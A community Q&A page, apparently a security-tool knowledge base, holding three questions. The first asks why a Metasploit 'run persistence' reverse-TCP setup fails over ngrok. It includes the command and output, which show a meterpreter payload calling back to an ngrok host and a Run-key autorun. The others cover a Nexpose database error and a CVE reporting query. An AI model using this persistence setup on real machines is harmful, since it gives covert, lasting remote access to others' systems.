Knowledge Base

Ask A Question

Questions

1

Reverse TCP persistence doesn't work over internet

Hey guys. I've been playing around with some reverse shells on a couple virtual machines and I've recently gotten it to work over the internet using ngrok to port forward to my local computer, which works great, except for the fact that the "run persistence" attack doesn't work. I've never had problems with "run persistence" when testing on a local network. The command will execute and go through without any errors and it also installs the persistence files on the target, but it doesn't actually execute the persistence script on the target and doesn't report back once the user reboots. If I manually click on the .vbs file on the target, then it'll work and it'll reconnect if I exit the session, so the settings should be good. It still doesn't run the script on start up though. This is the command I run: run persistence -r (IP) -p (port) -i 5 -U -X This is the output: [!] Meterpreter scripts are deprecated. Try post/windows/manage/persistence_exe. [!] Example: run post/windows/manage/persistence_exe OPTION=value [...] [*] Running Persistence Script [*] Resource file for cleanup created at /root/.msf4/logs/persistence/DESKTOP-VH5Q39J_20180216.4315/DESKTOP-VH5Q39J_20180216.4315.rc [*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=11086 [*] Persistent agent script is 99634 bytes long [+] Persistent Script written to C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs [*] Executing script C:\Users\admin\AppData\Local\Temp\DUviXBuZA.vbs [+] Agent executed with PID 4500 [*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW [+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\nxnYEQiLWTtsYW What's going on? How do I get it to work? I would really appreciate if you guys could help me out! Thanks in advance!

Posted by Ernst Reberto 10 months ago

1

Nexpose nxpgsql FATAL semctl()

Hi. It's problem for me "The Security Console is running in maintenance mode, which enables it to perform necessary internal tasks or to recover from the critical failure of one or more of its subsystems. You will not be able to run scans or generate reports while the Security Console is in maintenance mode. For more information, please see the topic Running VM in Maintenance Mode in the VM Administrator's Guide" nsc.log 2018-02-13T11:09:26 [INFO] [Thread: Security Console] Creating NSC config for database type postgresql. 2018-02-13T11:09:26 [INFO] [Thread: Security Console] Starting up postgresql DB system 2018-02-13T11:09:26 [INFO] [Thread: Security Console] PostgreSQL service status: 0. 2018-02-13T11:09:27 [INFO] [Thread: Security Console] PostgreSQL service status: 1. 2018-02-13T11:09:28 [ERROR] [Thread: Security Console] A critical error occured during initialization org.postgresql.util.PSQLException: FATAL: semctl(12582919, 3, SETVAL, 0) failed: Invalid argument at org.postgresql.core.v3.ConnectionFactoryImpl.doAuthentication(ConnectionFactoryImpl.java:443) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.core.v3.ConnectionFactoryImpl.openConnectionImpl(ConnectionFactoryImpl.java:217) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.core.ConnectionFactory.openConnection(ConnectionFactory.java:52) ~[postgresql-9.4.1212.jar:9.4.1212] at org.postgresql.jdbc.PgConnection.<init>(PgConnection.java:216) ~[postgresql-9.4.1212.jar:9.4.1212] Any suggetion. Tnx

Posted by John Sartana 10 months ago

1

SQL for vulnerability report against CVE

I need help with the following query, check vulnerabilities against Robot. I am also pulling asset group and Fix. The query runs but results doesn't match my dynamic asset group - the number of asset on vulnerabilities from query doesn't match against the number of asset in the dynamic asset group for Robot. Below is the query: SELECT dsi.name AS site, dag.name AS asset_group, da.ip_address, da.host_name, dv.title, dv.description, favi.port, dos.description AS operating_system, favi.key, da.last_assessed_for_vulnerabilities AS last_scanned, favi.date AS scan_finished, proofAsText(ds.fix) AS solution, proofAsText(favi.proof) AS proof FROM fact_asset_vulnerability_instance favi JOIN dim_vulnerability_solution dvs USING (vulnerability_id) JOIN dim_vulnerability dv USING (vulnerability_id) JOIN dim_asset da USING (asset_id) JOIN dim_operating_system dos USING (operating_system_id) JOIN dim_solution ds USING (solution_id) JOIN dim_site_asset dsa USING (asset_id) JOIN dim_site dsi USING (site_id) JOIN dim_asset_group_asset daga USING (asset_id) JOIN dim_asset_group dag USING (asset_group_id) WHERE dv.title ILIKE '%2017-6168%' OR dv.title ILIKE '%2017-17382%' OR dv.title ILIKE '%2017-17427%' OR dv.title ILIKE '%2017-17428%' OR dv.title ILIKE '%2017-12373%' OR dv.title ILIKE '%2017-%13098' OR dv.title ILIKE '%2017-%1000385' OR dv.title ILIKE '%2017-%13099' OR dv.title ILIKE '%2017-%17841' OR dv.title ILIKE '%2017-%6883' OR dv.title ILIKE '%2017-%5081' OR dv.description ILIKE '%2017-6168%' OR dv.description ILIKE '%2017-17382%' OR dv.description ILIKE '%2017-17427%' OR dv.description ILIKE '%2017-17428%' OR dv.description ILIKE '%2017-12373%' OR dv.description ILIKE '%2017-%13098%' OR dv.description ILIKE '%2017-%1000385%' OR dv.description ILIKE '%2017-%13099%' OR dv.description ILIKE '%2017-%17841%' OR dv.description ILIKE '%2016-%6883%' OR dv.description ILIKE '%2012-%5081%'

Posted by Kheun Chan 10 months ago